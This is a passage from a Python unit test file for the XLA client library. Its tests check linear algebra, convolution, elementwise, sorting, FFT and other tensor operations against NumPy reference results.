lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(list(x for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
